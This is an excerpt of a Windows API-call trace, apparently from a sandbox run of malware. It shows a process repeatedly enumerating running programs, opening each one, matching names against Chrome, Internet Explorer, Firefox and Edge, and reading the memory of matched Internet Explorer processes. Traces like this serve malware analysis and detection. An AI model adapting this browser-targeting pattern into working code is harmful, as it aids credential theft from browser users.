	[0222.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.662] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0222.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.662] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0222.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x54bc
	[0222.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.664] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0222.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.664] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.665] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0222.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.665] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.665] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0222.666] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x54c0
	[0222.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.666] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0222.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.666] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.667] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0222.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.667] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.667] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0222.668] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x54c4
	[0222.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.668] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0222.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.668] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.669] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0222.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.669] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0222.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x54c8
	[0222.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.670] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0222.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.670] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.671] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0222.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.671] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0222.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x54cc
	[0222.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.672] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0222.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.673] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.673] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0222.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.674] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.674] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0222.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x54d0
	[0222.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.676] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0222.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.677] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.677] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0222.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.678] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0222.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x54d4
	[0222.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.679] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0222.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.679] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.680] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0222.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.681] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.681] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0222.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x54d8
	[0222.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.682] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0222.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.682] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.683] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0222.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.683] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x54dc
	[0222.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.685] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.685] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.685] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.686] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.686] NtQueryInformationProcess (in: ProcessHandle=0x54dc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.686] ReadProcessMemory (in: hProcess=0x54dc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.686] ReadProcessMemory (in: hProcess=0x54dc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.687] ReadProcessMemory (in: hProcess=0x54dc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.687] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x54e0
	[0222.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.688] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.688] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.688] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.688] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.689] NtQueryInformationProcess (in: ProcessHandle=0x54e0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.689] ReadProcessMemory (in: hProcess=0x54e0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.689] ReadProcessMemory (in: hProcess=0x54e0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.689] ReadProcessMemory (in: hProcess=0x54e0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.689] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x54e4
	[0222.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.690] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.691] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.691] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.691] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.691] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0222.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x54e8
	[0222.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.692] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0222.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.693] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.693] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0222.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.693] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x54ec
	[0222.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.694] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.695] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.695] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.695] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.696] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.696] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x54f0
	[0222.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.697] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.698] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.698] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.698] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x54f4
	[0222.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.699] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.700] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.700] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.700] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.700] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x54f8
	[0222.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.701] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.702] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.702] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.703] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0222.704] CloseHandle (hObject=0x4fd0) returned 1
	[0222.704] Sleep (dwMilliseconds=0x64) 
	[0222.802] GetCurrentProcessId () returned 0x110
	[0222.802] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0222.806] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0222.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0222.809] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0222.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x54fc
	[0222.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.810] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.811] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.811] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.812] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.812] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0222.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5500
	[0222.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.814] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.814] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.815] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.816] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.817] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0222.818] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5504
	[0222.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.818] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0222.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.818] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.819] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0222.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.819] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.820] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0222.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5508
	[0222.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.821] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.822] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.822] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.822] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.823] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0222.824] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x550c
	[0222.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.824] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0222.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.824] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.825] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0222.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.826] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
